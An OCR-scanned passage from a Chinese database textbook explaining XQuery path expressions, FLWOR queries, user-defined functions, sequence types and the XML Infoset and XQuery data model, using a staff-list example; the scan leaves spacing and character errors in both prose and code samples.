路 径 表 达 式 中 的 每 一 步 表 示 在 文档 中 朝 特 定 方向 的 一 次 移动 ， 并 且 每 一 步 通 过 使 用 一 
个 或 多 个 谓词 ， 可 以 消除 结 点 。 每 一 步 的 结果 是 一 个 结 点 列表 ， 这些 结 点 作为 下 一 步 的 起 始 
点 。 一 个 路 径 表 达 式 可 以 从 识别 一 个 特定 的 结 点 开始 。 比 如 函数 document ( string)， 这 个 函 
数 返 回 一 个 指定 文档 的 根 结 点 。 查 询 也 可 以 包含 一 个 以 “/” 或 者 “ //” 开 始 的 路 径 表 达 式 ， 
表示 一 个 查询 执行 环境 中 确定 的 根 结 点 。 下 面 给 出 路 径 表 达 式 的 一 些 例子 。 


| 例 30.4 3》》XQuery 路 径 表达 式 的 示例 

( 1) 查找 图 30-5 所 示 XML 文档 中 的 第 一 位 员工 的 员工 编号 。 

doc("staff list.xml")/STAFFLIST/STAFF[1]//STAFFNO 

这 个 例子 使 用 了 一 个 由 四 步 组 成 的 路 径 表 达 式 : 第 一 步 打 开 staff list.xml 文档 并 返回 
其 文档 结 点 ; 第 二 步 用 /STAFFLIST 在 文档 顶部 选择 STAFFLIST 元 素 ; 第 三 步 定 位 第 一 个 
STAFF 元 素 ， 它 是 STAFFLIST 的 子 结 点 ; 最 后 查找 任意 位 置 的 STAFF 元 素 中 的 STAFFNO 
元 素 。 知 道 了 文档 的 结构 ， 我 们 也 可 以 用 下 面 的 方法 表达 : 

doc("staff list.xml")//STAFF[1]/STAFFNO 
或 

doc("staff list.xml")/STAFFLIST/STAFF[1]/STAFFNO 

(2 ) 查找 前 两 位 员工 的 员工 编号 。 

doc("staff list.xml")/STAFFLIST/STAFF[1 TO 2]/STAFFNO 

与 前 一 个 例子 相似 ， 但 使 用 了 范围 表达 式 (TO) 来 从 前 两 个 STAFF 元 素 中 选择 STAFFNO 元 素 。 

(3 ) 查找 分 公司 B005 中 的 员工 姓氏 。 

doc("staff list.xml")/STAFFLIST/STAFF[@branchNo = "B005"]/LNAME 
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这 个 例子 使 用 由 五 步 组 成 的 一 个 路 径 表 达 式 ， 前 两 步 与 第 一 个 例子 一 样 。 第 三 步 使 用 / 
STAFF 在 STAFFLIST 元 素 中 选择 STAFF 元 素 ; 第 四 步 由 一 个 谓词 组 成 (谓词 被 方 括号 括 住 ) 
该 谓词 将 STAFF 元 素 限制 在 那些 BRANCHNO 属性 等 于 B005 的 元 素 范围 中 ; 最 后 在 受 限 
的 STAFF 元 素 中 选择 任意 位 置 的 LNAME 元 素 。 «< 

FLWOR 表达 式 

FLWOR ( 读 作 “fower”) 表达 式 由 FOR、LET、WHERE 和 RETURN 子 句 构造 。FLWOR 
表达 式 的 语法 是 : 


FOR forVar IN inExpression 
LET letVar := letExpression 
[WHERE fiterExpression] 
[ORDER BY orderSpec] 
RETURN expression 


FLWOR 表达 式 由 一 个 或 多 个 任意 顺序 FOR 或 者 
LET 子 名 开始 ， 后 接 可 选 的 WHERE 子 句 ， 可 选 的 
ORDER BY 子 句 和 必需 的 RETURN 子 句 。 像 在 SQL 
查询 中 一 样 ， 这 些 子 句 必 须 有 序 出 现 ， 如 图 30-17 所 
示 。FLWOR 表达 式 将 值 绑 定 到 一 个 或 者 多 个 变量 ， 
然后 用 这 些 变量 构造 一 个 结果 。 由 FOR 和 LET 子 名 
创建 的 变量 绑 定 组 合 被 称 为 元 组 。 

FOR 和 LET 子 句 FOR 子 句 和 LET 子 句 的 作 
用 是 使 用 表达 式 (例如 路 径 表达 式 ) 将 值 绑 定 到 一 个 


约束 变量 
元 组 列表 


受 限 的 约束 
变量 元 组 列表 





或 多 个 变量 上 。FOR 子 句 在 任何 需要 循环 的 地 方 使 入 中 的 元 组 
用 ， 它 将 指定 的 变量 与 一 个 返回 结 点 列表 的 表达 式 相 

联系 。FOR 子 句 的 结果 是 一 个 元 组 流 ， 其 中 每 个 元 组 

对 给 定 变 量 进 行 一 次 绑 定 ， 绑 定 为 所 关联 的 表达 式 计 了 


值 项 之 一 。FOR 子 句 中 的 每 个 变量 可 以 认为 是 在 它 关 
联 的 表达 式 返 回 的 结 点 上 迭代 。 30-17 一 个 FLWR 表达 式 中 的 数据 流 

LET 子 句 同样 可 以 将 一 个 或 者 多 个 变量 绑 定 到 一 个 或 者 多 个 表达 式 中 ,但 是 没有 循环 ， 
结果 是 一 个 变量 有 一 次 绑 定 。 举 个 例子 ， 子 句 FOR $S IN /STAFFLIST/STAFF 导致 多 次 绑 
定 ， 每 次 将 变量 $S 绑 定 到 STAFFLIST 中 的 一 个 STAFF 元 素 上 。 另 一 方面 ， 子 句 LET $S:=/ 
STAFFLIST/STAFF 将 变量 $S 绑 定 到 包含 所 有 STAFF 元 素 的 列表 上 。 

FLWOR 表达 式 可 以 包含 几 个 FOR 和 LET 子 句 ， 每 一 个 子 句 都 可 以 引用 在 前 面子 句 中 
绑 定 的 变量 。 

WHERE 子 名 “可 选 的 WHERE 子 名 指定 一 个 或 者 多 个 条 件 来 限制 FOR 和 LET 子 句 
产生 的 元 组 集 。 由 FOR 子 句 绑 定 的 变量 表示 单个 结 点 ， 通 常 被 用 在 标量 谓词 中 ， 例 如 $S/ 
SALARY>10000。 男 一 方面 ，LET 子 句 绑 定 的 变量 可 以 表示 结 点 列表 ， 因 此 可 以 用 在 一 个 
面向 列表 的 谓词 中 ， 比 如 AVG ($S/SALARY ) >20000。 

RETURN 和 ORDER BY 子 句 ”为 元 组 流 中 的 每 个 元 组 计 值 一 次 RETURN 子 句 ， 所 
有 计 值 结果 连接 成 为 FLWOR 表达 式 的 结果 。 如 果 指 定 了 ORDER BY 子 句 ， 它 确定 元 组 
流 的 次 序 ， 进 而 确定 RETURN 子 句 利用 绑 定 的 变量 在 各 元 组 求 值 的 顺序 。 如 果 没 有 指定 
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ORDER BY 子 句 ， 元 组 流 的 次 序 则 通过 FOR 子 句 中 表达 式 返 回 序列 的 次 序 确定 。ORDER 
BY 子 句 可 有 一 个 或 多 个 称 为 orderspecs 的 排序 说 明 ， 每 个 说 明 给 出 一 个 用 来 给 结果 排序 的 
表达 式 。 每 个 orderspecs 都 可 以 选择 以 升序 或 降序 排列 ， 或 者 说 明 怎 样 处 理 求 值 为 空 序列 的 
表达 式 ， 或 者 提供 一 个 可 用 的 排序 规则 ( collation)。ORDER BY 子 句 也 能 够 指出 怎样 给 值 
相等 的 两 个 项 目 排序 (用 限定 词 STABLE 保持 两 个 项 目的 相对 次 序 ， 和 否则 由 实现 确定 排序 ) 。 
下 面 给 出 FLWOR 表达 式 的 一 些 示 例 。 


| 例 30.5 》》XQuery FLWOR 表达 式 的 示例 

(1 ) 烈 出 工资 为 30000 英镑 的 员工 。 

LET $SAL := 30000 

RETURN doc("staff list.xml")//STAFFISALARY = $SAL] 

这 是 路 径 表达 式 的 一 个 简单 扩展 ， 带 有 一 个 用 来 表述 我 们 希望 约束 的 工资 值 变量 。 对 图 

30-5 中 的 XML 文档 ， 仅 有 一 个 STAFF 元 素 满足 这 个 谓词 ， 因 此 该 查询 结果 是 : 
<STAFF branchNo = "B005"> 
<STAFFNO>SL21</STAFFNO> 
<NAME> 
<FNAME>John</FNAME><LNAME>White</LNAME> 
</NAME> 
<POSITION> Manager</POSITION> 
<DOB>1945-10-01</DOB> 
<SALARY>30000</SALARY > 

</STAFF> 

继续 之 前 ， 注 意 该 查询 中 有 趣 的 两 点 : 

@ 该 谓词 表面 上 是 将 一 个 元 素 (SALARY) 同一 个 值 (30000 ) 进行 比较 ， 实 际 上 ,“=” 
操作 符 提 取 了 该 元 素 类 型 化 的 值 ， 此 例 是 一 个 十 进 制 的 数值 ( 见 图 30-14 )， 将 这 个 
值 同 30000 进行 比较 。 

e “=” 操 作 符 被 称 为 一 般 比 较 操作 符 (general comparison operator)。XQuery 也 定 
义 了 值 比较 操作 符 (value comparison operator) (“eq’, ‘ne’, ‘lt’, le gt， 
“ ge” )， 用 来 比较 两 个 原子 值 。 如 果 任 何 一 个 操作 数 是 结 点 ， 原 子 化 (atomization ) 
用 来 将 其 转换 成 一 个 原子 值 (如 果 任 何 一 个 操作 数 未 类 型 化 ， 就 将 其 看 作 字 符 串 )。 
如 果 类 型 信息 未 知 (例如 ， 文档 有 DTD 但 不 是 XML Schema)， 则 需要 将 SALARY 
元 素 转换 成 合适 的 类 型 ; 


xs:decimal(SALARY) gt $SAL 


如 果 试 图 将 一 个 原子 值 与 一 个 返回 多 个 结 点 的 表达 式 进 行 比较 ， 那 么 有 任意 一 个 值 满足 
谓词 时 ， 一 般 比 较 操 作 符 即 返 回 真 ， 但 是 这 种 情况 下 值 比较 操作 符 将 报错 。 

(2 ) 列 出 分 公司 B005 中 工资 高 于 15000 英镑 的 员工 。 

FOR $S IN doc("staff list.xm]")//STAFF 

WHERE $S/SALARY > 15000 AND $S/@branchNo = "B005" 

RETURN $S/STAFFNO 

这 个 例子 中 ， 我 们 用 FOR 子 句 遍历 文档 中 的 STAFF 元 素 ， 并 且 对 每 个 STAFF 元 素 测试 
SALARY 元 素 和 branchNo 属性 。 该 查询 结果 为 ;: 
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<STAFFNO>SL21</STAFFNO> 


有 效 布尔 值 ( Effective Boolean Value，EBV) 的 概念 对 轴 辑 表达 式 的 求 值 非常 关键 。 任 何 
一 个 空 序列 的 EBV 为 假 。 如 果 表 达 式 计 值 the xs:boolean 为 假 ， 或 计 值 为 数字 或 二 进 制 零 ， 或 
长 度 为 零 字 符 ， 或 特殊 的 浮 点 值 NaN ( 非 数 字 ) 时 , EBV 值 均 为 假 ， 其 他 序列 的 EBV 值 为 真 。 
(3 ) 列 出 所 有 员工 ， 以 员工 号 码 降序 排列 。 


FOR $S IN doc("staff list.xml")//STAFF 
ORDER BY $S/STAFFNO DESCENDING 
RETURN $S/STAFFNO 


该 查询 用 ORDER BY 子 名 提供 要 求 的 排序 。 查 询 结 果 为 : 


<STAFFNO>SL21</STAFFNO> 
<STAFFNO>SG37</STAFFNO> 


(4) 列 出 每 一 个 分 公司 和 该 分 公司 的 平均 工资 。 


FOR $B IN distinct-values(doc("staff list.xml")//@branchNo) 
LET $avgSalary := avg(doc("staff list.xml]")//STAFF[@branchNo = $B]/SALARY) 
RETURN 
<BRANCH> 
<BRANCHNO> {$B/text()} </BRANCHNO> 
<AVGSALARY > $avgSalary</AVGSALARY> 
</BRANCH> 


该 例子 示范 了 利用 预定 义 函 数 distinct-values() 产生 一 组 互 不 相同 的 分 公司 数字 ， 并 且 
示范 了 元 素 构 造 器 怎样 用 在 RETURN 子 句 里 。 它 也 展示 了 聚合 函数 用 于 SALARY 元 素 计 
算 给 定 分 公司 的 平均 工资 。 如 同 我 们 在 第 一 个 例子 中 所 提示 的 atomization 机 制 被 用 来 提取 
SALARY 元 素 类 型 化 的 值 ， 从 而 计算 平均 值 。 

(5) 列 出 多 于 20 名 员工 的 分 公司 。 


<LARGEBRANCHES>{ 
FOR $B IN distinct-values(doc("staff list.xml")/@branchNo) 
LET $S := doc("staff list.xml")//STAFF[@branchNo = $B] 
WHERE count($S) > 20 
RETURN 

<BRANCHNO> {$B/text()} </BRANCHNO>} 
</LARGEBRANCHES> 


注意 ，WHERE 子 名 可 以 包含 任意 值 为 布尔 型 的 表达 式 ， 这 同 SQL 语 名 不 同 ( 见 6.20 例子 )。 
(6) 列 出 至 少 有 一 名 员工 工资 高 于 15 000 英镑 的 分 公司 。 


<BRANCHESWITHLARGESALARIES> 1{ 
FOR $B IN distinct-values(doc("staff list.xml")//@branchNo) 
LET $S := doc("staff list.xml")//STAFF[@branchNo = $B] 
WHERE SOME $sal IN $S/SALARY 

SATISFIES ($sal > 15000) 
ORDER BY $B 
RETURN 

<BRANCHNO> {$B/text()} </BRANCHNO>} 

</BRANCHESWITHLARGESALARIES> 


在 这 个 例子 中 ,我 们 在 WHERE 子 句 中 用 存在 量词 SOME 来 约束 返回 至 少 有 一 个 员工 
工资 大 于 £15 000 的 分 公司 。XQuery 提供 了 全 称 量词 EVERY， 用 来 测试 是 否 序列 中 每 个 结 
点 都 满足 条 件 。 注 意 在 空 序 列 上 加 全 称 量词 计 值 为 真 。 人 例如， 如果 我 们 用 全 称 量词 测试 员工 
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的 生日 (date of birth，DOB) 是 否 都 在 某 个 日 期 之 前 ， 对 应 SG37 的 STAFF 元 素 应 该 包括 
在 内 (因为 没有 DOB 元 素 )。 《《 

下 面 几 个 例子 中 我 们 将 展示 XQuery 怎么 用 FOR 和 WHERE 子 句 连 接 XML 文档 。 为 了 示 
范 ， 我 们 引入 另 一 个 XML 文档 ， 在 文件 nok.xml 中 包含 了 员工 家 属 的 情况 ， 如 图 30-18 所 示 。 


| 例 30.6 入 XQuery FLWOR 表达 式 : 连接 两 个 文档 
(1) 列举 员工 及 其 家 属 详细 资料 。 es 


FOR $S IN doc("staff list.xml")//STAFF, 
$NOK IN doc("'nok.xml")/NOK 
WHERE $S/STAFFNO = $NOK/STAFFNO 
RETURN <STAFFNOK> { $S, $NOK/NAME } </STAFFNOK> 


FLWOR 表达 式 能 够 绑 定 一 个 变量 到 员工 数据 ， 绑 定 图 30-18 关于 家 属 的 XML 
另 一 个 变量 到 家 属 数据 ， 可 借 此 比较 两 个 文件 中 的 数据 ， 并 产生 组 合 这 些 数 据 的 结果 。 对 于 知 
道 SQL 连接 语句 的 读者 来 说 ， 这 种 结构 看 起 来 也 很 熟悉 。 该 查询 的 结果 是 : 


<STAFFNOK> 
<STAFF branchNo = "B005"> 
<STAFFNO>SL21</STAFFNO> 
<NAME> 
<FNAME>John</FNAME> <LNAME>White</LNAME> 
</NAME> 
<POSITION> Manager</POSITION> 
<DOB>1945-10-01</DOB> 
<SALARY>30000</SALARY> 
</STAFF> 
<NAME>Mrs Mary White</NAME> 
</STAFFNOK> 


注意 员工 成 员 SG37 没有 家 属 ， 所 以 没有 包括 在 结果 中 。 下 一 个 例子 示范 了 不 管 是 否 有 
家 属 ， 怎 样 包 括 所 有 的 员工 。 
(2 ) 列举 所 有 员工 及 其 家 属 详细 资料 。 


FOR $S IN doc("staff list.xml")/STAFF 
RETURN 
<STAFFNOK> 

{ $s} 

{ 





FOR $NOK IN doc("nok.xml")//NOK 
WHERE $S/STAFFNO = $NOK/STAFFNO 
RETURN $NOK/NAME 


</STAFFNOK> 


在 这 个 例子 中 ,我 们 希望 列举 每 一 个 员工 的 详细 资料 ， 不 管 他 /她 是 否 有 家 属 。 关 系 模型 
中 ， 这 就 是 众所周知 的 左 外 部 连接 ( 见 4.1.3 节 )。 外 部 的 FOR 语句 循环 遍历 第 一 个 XML 文档 
中 的 每 一 个 STAFF 元 素 ， 内 部 的 FOR 语句 循环 遍历 第 二 个 XML 文档 中 的 每 一 个 NOK 元 素 ， 
并 且 当 STAFFNO 相同 时 匹配 这 些 元 素 。 但 是 ， 这 种 情况 下 ， 不 管 员工 成 员 是 否 有 匹配 的 家 属 ， 
第 一 个 RETURN 子 句 执行 表达 式 { $S } 返回 STAFF 元 素 。 该 查询 的 结果 如 图 30-19 所 示 。 
(3 ) 列举 每 个 分 公司 和 在 该 分 公司 工作 的 员工 。 


< BRANCHLIST> 


FOR $B IN distinct-values(doc("staff list.xml")//@branchNo) 
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ORDER BY $B 

RETURN 
<BRANCHNO> {$B/text()} 
{ 


FOR $S IN doc("staff list.xml")//STAFF 

WHERE $S/@branchNo = $B 

ORDER BY $S/STAFFNO 

RETURN $S/STAFFNO, $S/NAME, $S/POSITION, $S/SALARY 


} 
</BRANCHNO> 


} 
</BRANCHLIST> 


<STAFFNOK> 
<STAFF branchNo = “BO05”> 
<STAFFNO>SL21</STAFFNO> 
<NAME> 
<FNAME>John</FNAME><LNAME>White</LNAME> 
</NAME> aA] ; 
<POSITION>Manager</POSITION> 
<DOB3>1945-10-01</DOB> 
<SALARY>30000</SALARY> 
</STAFF> 
<NAME>Mrs Mary White</NAME> 
<ISTAFFNOK> 
<STAFFNOK> 
<STAFF branchNo = "B003”> 
<STAFFNOSSG37</STAFFNO> 
<NAME> | , 
<FNAME>Ann</FNAME><LNAME>Beech</LNAME> 
</NAME> 
<POSITION>Assistant</POSITION> 
<SALARY>12000</SALARY> 
</STAFF> 
</STAFFNOK> 


图 30-19 例 30.6 (2) 的 结果 


该 查询 示范 了 FLWOR 表达 式 怎样 嵌入 在 RETURN 子 句 中 ， 此 例 是 为 了 按 分 公司 编号 ， 
分 公司 内 又 按 员工 编号 来 重新 排列 文档 。 <« 

预定 义 函数 和 用 户 自 定义 函数 

我 们 已 经 介绍 了 XQuery 的 一 些 预 定义 函数 : doc()、distinct-values()、count() 和 avg()。 
还 定义 了 许多 其 他 的 函数 ， 例 如 : 

e 共有 的 聚合 函数 min()、max()、sum()。 
字符 捉 函 数 substring()、string-length()、starts-with()、ends-with() 和 concat()。 
数值 函数 round()、floor() 和 ceiling()。 
其 他 函数 ， 比 如 notO0、empty0， 用 来 测试 一 个 序列 是 否 是 空 的 ; exists()， 用 来 测试 
一 个 序列 是 否 至 少 有 一 个 项 目 ; string0， 返 回 一 个 结 点 的 字符 串 值 ; data0， 返 回 一 
个 结 点 类 型 化 的 值 。 

这 些 函 数 定义 在 XQuery 1.0 和 XPath 2.0 的 函数 和 操作 符 规范 (W3C，2003i) 中 。 另 外 ， 
用 户 利用 DEFINE FUNCTION 能 够 创造 他 们 自己 的 函数 ，DEFINE FUNCTION 先 指定 函数 
标签 ， 接 着 用 花 括 符 ( {}) 括 住 函数 体 。 函 数 标签 中 给 出 了 用 逗号 分 隔 的 输入 参数 列表 和 返 
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回 类 型 ， 函 数 体 可 以 是 任意 复杂 的 表达 式 , 但 是 必须 返回 函数 标签 指定 类 型 的 值 。 下 一 个 例 
子 展示 了 用 户 自 定义 函数 的 说 明和 使 用 。 


| 例 30.7 3》》 用 户 自 定义 函数 的 示例 
创建 一 个 函数 返回 指定 分 公司 员工 信息 : 
DEFINE FUNCTION staffAtBranch($branchNumber) AS element()* 
{ 
FOR $S IN doc("staff list.xml")/STAFF 
WHERE $S/@branchNo = $branchNumber 
ORDER BY $S/STAFFNO 


RETURN $S/STAFFNO, $S/NAME, $S/POSITION, $S/SALARY 
} 


这 个 函数 基于 例 30.6 (3 ) 中 的 内 循环 。 我们 现在 可 以 用 下 列 函数 调用 代替 这 个 循环 : 
staffAtBranch( $ B) .44 


由 于 XML 人 允许 递归 的 结构 , XQuery 也 支持 用 户 自 定义 的 函数 是 递归 的 ， 从 而 简化 递归 
XML 的 处 理 。 如 图 30-20 所 示 ， 函 数 能 够 放 入 库 模块 中 ， 只 要 在 模块 开头 加 上 MODULE 
声明 ， 例 如 : 


MODULE "http://www.dreamhome.co.uk/library/staff list" 


于 是 在 查询 的 prolog ( prolog 是 一 系列 declarations 和 imports， 创 造 了 查询 执行 的 环境 ) 节 ， 
通过 指定 该 模块 的 URI， 就 能 在 查询 中 引入 该 模块 ， 并 且 可 以 选择 找到 该 模块 的 位 置 ， 例 如 : 

IMPORT MODULE "http://www.dreamhome.co.uk/library/staff_list" 

AT "file:///C:/xroot/lib/staff list.xq" 

类 型 和 序列 类 型 

XQuery 中 每 个 元 素 或 属性 都 有 一 个 类 型 说 明 ， 
如 果 元 素 通 过 XML Schema 验证 ， 那 么 它 具 有 该 模式 Lvrary maaus 
中 指定 的 类 型 ( 见 30.4 节 )。 如 果 元 素 未 通过 验证 ， 
也 没有 一 个 类 型 说 明 ， 它 将 具有 省 缺 类 型 xs:anyType 
(或 为 xdt:untypedAtomic， 对 属性 结 点 )。 原 子 ( 非 结 
点 ) 值 也 可 有 一 个 类 型 说 明 。 型 如 xdtuntypedAtomic 人 
的 说 明 表 示 类 型 未 知 (典型 的 出 自 无 模式 的 XML 文档 的 文字 )。 施 加 在 原子 值 上 的 操作 可 将 这 
样 的 一 个 类 型 映射 为 一 个 具体 类 型 ， 例 如 xs:string， 但 若 原子 值 类 型 错误 ， 运 行 时 也 可 能 出 错 。 

如 本 节 开 始 时 所 述 ，XQuery 的 表达 式 的 值 为 一 个 序列 ， 用 于 描述 它们 的 类 型 称 为 序列 
类 型 。 在 前 例 中 ， 函 数 staffAtBranch() 的 返回 类 型 被 定义 为 element()*， 这 是 一 个 预定 义 类 
型 ， 能 匹配 任意 元 素 结 点 。“*” 是 出 现 指示 器 ( occurrence indicator) 代表 零 次 或 多 次 出 现 
(其 他 的 指示 器 有 “+” 代 表 一 次 或 多 次 出 现 ,“?” 代 表 零 次 或 一 次 出 现 )。 其 他 的 预定 义 函 
数 包括 能 适用 于 任意 结 点 的 attribute()、document-node()、text() 和 node()， 以 及 能 适用 于 任 
何 原子 值 或 结 点 的 item()。 

XQuery 允许 在 查询 中 使 用 模式 中 定义 的 元 素 名 称 、 属 性 和 类 型 。 查 询 的 prolog 部 分 用 
IMPORT 子 句 显示 列 出 了 该 查询 引入 的 模式 ， 通 过 目标 命名 空间 来 识别 每 个 模式 : 


IMPORT SCHEMA namespace staff 
= "http://www.dreamhome.co.uk/staff list.xsd" 


Main module 
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表 30-3 提供 了 例子 ， 曾 释 怎样 使 用 图 30-14 所 示 XML Schema 引入 的 类 型 。 同 时 函数 
返回 类 型 、 利 用 LET 子 句 限制 的 函数 参数 和 变量 也 能 够 通过 序列 类 型 来 声明 。 如 果 参 数 或 
变量 类 型 不 匹配 并 且 不 能 转换 ， 产 生 类 型 错误 (我们 将 在 30.5.6 节 讨 论 类 型 错误 )。 有 若干 
针对 类 型 有 用 的 操作 

e 预定 义 函 数 instance-of() 能 用 来 测试 某 个 项 是 否 具 有 给 定 的 类 型 。 

。 TREAT AS 表达 式 能 够 用 来 在 静态 分 析 时 断言 某 个 值 属于 特定 的 类 型 ， 如 果 不 是 这 
样 运行 时 报错 。 

TYPESWITCH 表达 式 与 某 些 编程 语言 中 的 CASE 语句 类 似 ， 它 基于 输入 值 的 类 型 选 
择 表达 式 求 值 。 

CASTABLE 表达 式 测试 给 定 值 是 否 能 够 被 转换 成 给 定 的 目标 类 型 。 

CAST AS 表达 式 将 一 个 值 转换 成 某 个 特定 的 类 型 必须 是 某 个 命名 的 原子 类 型 ， 例 如 : 


IF $x CASTABLE AS xs:string 
THEN $x CAST AS xs:string ELSE ... 


表 30-3 图 30-14 中 XML Schema 引入 的 类 型 的 例子 


序列 类 型 声明 匹 配 
element (STAFFNO, STAFFNOTYPE) 具有 类 型 STAFFNOTYPE、 名 为 STAFFNO 的 元 素 
element (*, STAFFNOTYPE) 类 型 为 STAFFNOTYPE 的 元 素 


具有 类 型 xsd:decimal (在 STAFF 元 素 内 声明 的 SALARY 元 素 
的 类 型 )， 名 为 SALARY 的 元 素 


attribute (@branchNo, BRANCHNOTYPE) 具有 类 型 BRANCHNOTYPE， 名 为 branchNo 的 属性 


具有 类 型 BRANCHNOTYPE (在 STAFF 元 素 内 声明 的 branchNo 
元 素 的 类 型 )， 名 为 branchNo 的 属性 


attribute (@*, BRANCHNOTYPE) 类 型 为 BRANCHNOTYPE 的 任意 属性 


element (STAFF/SALARY) 


attribute (STAFF/@branchNo ) 


XQuery 语言 更 完整 的 描述 超出 了 本 书 的 范围 ， 对 其 余 信 息 感 兴趣 的 读者 可 以 参考 W3C 
XQuery 规范 。 本 章 的 剩余 部 分 ， 我 们 将 研究 W3C XML 查询 工作 组 的 两 种 其 他 规范 一 一 XML 
查询 数据 模型 (XML Query Data Model) 和 XQuery 形式 化 语义 (XQuery Formal Semantics ) 。 
我 们 从 简单 讨论 XML Infoset 开始 ， 这 在 XML 查询 数据 模型 中 要 用 到 。 


30.5.4 XML 信息 集 


XML 信息 集 (或 称 Infoset) 是 某 个 合式 的 、 满 足 XML 命名 空间 约束 ( W3C，2001e) 
的 XML 文档 中 可 用 信息 的 抽象 描述 。XML Infoset 试图 定义 一 套 术 语 ， 使 得 其 他 XML 规范 
能 够 引用 该 合式 的 (尽管 不 一 定 合 法 ) XML 文档 中 的 信息 项 。Infoset 并 不 企图 定义 一 个 完 
整 的 信息 集合 ， 也 不 代表 一 个 XML 处 理 器 应 该 返回 给 应 用 的 最 少 信息 ， 它 也 没有 授权 一 个 
特定 的 接口 或 接口 类 。 尽 管 规范 将 信息 集合 描述 得 像 一 棵 树 结 构 ， 但 是 其 他 类 型 的 接口 ， 比 
如 基于 事件 或 者 基于 查询 的 接口 ， 都 能 够 用 来 提供 与 信息 集合 相 容 的 信息 。 

XML 文档 的 信息 集合 由 两 个 或 多 个 信息 项 组 成 。 一 个 信息 项 目 是 XML 文档 一 个 组 
件 的 抽象 描述 ， 例 如 元 素 、 属 性 或 者 处 理 指令 。 每 个 信息 项 有 一 组 相关 的 属性 ， 例 如 ， 
document 信息 项 大 体 上 有 下 列 适 合 XML 语言 的 属性 : 

e [document element] ， 标 示 唯 一 一 个 文档 元 素 〈 一 个 文档 中 所 有 元 素 的 根 )。 

e [children]， 包 含 一 个 元 素 (这 个 文档 元 素 ) 的 信息 项 的 有 序列 表 ， 加 上 每 个 处 理 指令 
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的 一 条 信息 项 或 出 现在 文档 元 素 之 外 的 注释 。 如 果 有 DTD ， 则 一 个 孩子 就 是 该 DTD 
信息 项 。 
e [notations]， 符 号 信息 项 的 无 序 集 ， 每 个 DTD 中 声明 的 符号 都 有 一 项 。 
e [unparsed entities]， 未 解析 实体 信息 项 的 无 序 集 ， 每 个 DTD 中 声明 的 未 解析 实体 都 
有 一 项 。 
® [base URI] 、[character encoding scheme]、 [version] 和 [standalone]。 
信息 集合 至 少 包含 一 个 文档 信息 项 和 一 个 元 素 信息 元 素 。 参 考 XML Infoset 的 规范 必须 
遵守 下 列 原 则 : 
e 说 明 其 支持 哪些 信息 项 和 属性 。 
e 详细 说 明 怎样 处 理 不 支持 的 信息 项 和 属性 〈( 例 如， 不 作 任何 改变 传递 给 应 用 )。 
e 详细 说 明 其 认为 重要 但 是 Infoset 没有 定义 的 额外 信息 。 
e 指出 任何 违反 Infoset 术语 的 地 方 。 
后 模式 验证 信息 集 
XML Infoset 不 包含 类 型 信息 。 为 了 克服 这 一 点 ，XML Schema 定义 了 XML 信息 集 的 
扩展 形式 ， 称 为 后 模式 验证 信息 集 ( Post-Schema Validation Infoset，PSVI)。 在 PSVI 中 ， 
描述 元 素 和 属性 的 信息 项 含有 类 型 说 明 (type annotation) 和 由 XML Schema 处 理 器 返回 的 
规范 化 值 。PSVI 包含 查询 处 理 器 所 需要 的 XML 文档 的 所 有 信息 。 下 面 即将 说 明 XML 查询 
数据 模型 基于 PSVI 中 包含 的 信息 。 


30.5.5 XQuery 1.0 和 XPath 2.0 数据 模型 


XML Query 1.0 和 XPath 2.0 Data Model (后 面 将 简称 为 Data Model) 定义 了 这 样 一 些 信 
息 ， 它 们 包含 在 XSLT 或 XML 查询 处 理 器 的 输入 中 ， 也 包含 在 所 有 XSLT、XQuery 和 XPath 
允许 的 表达 式 值 中 (W3C, 2007h; 2010h)。 基 于 XML 信息 集 的 数据 模型 具有 下 列 新 特征 : 

e 支持 XML Schema 类 型 。 

e 文档 集 表 示 和 复杂 值 的 表示 。 

e 支持 类 型 化 的 原子 值 。 

e 支持 有 序 的 、 异 构 的 序列 。 

XPath 语言 被 定 为 XQuery 语言 的 子 集 。XPath 规范 说 明了 如 何 将 XML INFOSET 中 的 
信息 表示 为 一 个 包含 七 类 结 点 (文档 、 元 素 、 属 性 、 文 本 、 注 释 、 命 名 空间 或 处 理 指 令 ) 的 
树 形 结构 ， 以 及 根据 这 七 类 结 点 定义 的 XPath 操作 符 。 为 了 保留 这 些 操作 而 使 用 由 XML 
Schema 提供 的 更 丰富 的 类 型 系统 ，XQuery 通过 包含 PSVI 中 的 额外 信息 扩展 了 XPath 数据 
模型 。 

XML 查询 数据 模型 是 一 种 带 标记 结 点 、 树 形 构造 器 的 表示 法 ， 它 包括 结 点 标识 的 概念 ， 
此 概念 简化 了 XML 引用 值 的 表示 (比如 IDREF 、XPointer 和 URI 值 )。 Data Model 的 实例 
表示 一 个 或 多 个 完整 的 文档 或 者 文档 部 分 ， 每 一 个 都 由 它 自己 的 结 点 树 表示 。 数 据 模 型 中 ， 
每 个 值 都 是 由 零 个 或 多 个 项 组 成 的 有 序 序列 ， 每 个 项 可 以 是 一 个 原子 值 或 结 点 。 原 子 值 具有 
类 型 要么 是 XML Schema 中 定义 的 原子 类 型 之 一 ， 要 么 是 这 些 类 型 的 约束 。 当 一 个 结 点 
加 入 到 一 个 序列 中 时 ， 其 标识 保持 相同 。 因 而 一 个 结 点 可 以 在 多 个 序列 中 出 现 ， 一 个 序列 也 
可 以 包含 重复 的 项 。 

描述 XML 文档 的 根 结 点 是 一 个 文档 结 点 ， 文 档 中 每 个 元 素 由 一 个 元 素 结 点 描述 。 属 性 
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由 属性 结 点 描述 ， 内 容 由 文本 结 点 和 骨 套 的 元 素 结 点 描述 。 文 档 中 的 原始 数据 由 文本 结 点 描 
述 ， 这 些 文本 结 点 组 成 结 点 树 的 叶子 结 点 。 元 素 结 点 可 以 被 连接 到 属性 结 点 和 文本 结 点 或 赂 
套 的 元 素 结 点 。 每 个 结 点 仅 属于 一 棵 树 ， 每 棵 树 仅 有 一 个 根 结 点 。 根 结 点 为 文档 结 点 的 树 被 
称 作 文档 (document)， 跟 结 点 为 其 他 种 类 结 点 的 树 被 称 为 片段 (fragment)。 

在 Data Model 中 ,， 结 点 信息 通过 能 处 理 任 意 结 点 的 访问 器 函数 (accessor function) 获 
得 。 访 问 器 函数 同 信息 项 的 指定 属性 很 类 似 。 访 问 器 函数 是 说 明 性 的 ， 主 要 用 来 作为 信息 
的 简洁 描述 ， 这 些 信 息 只 能 通过 Data Model 暴露 ， 不 能 指定 精确 的 编程 接口 来 获取 。 Data 
Model 也 详细 说 明了 许多 构造 器 函数 ， 用 来 阐明 结 点 是 如 何 构造 的 。 

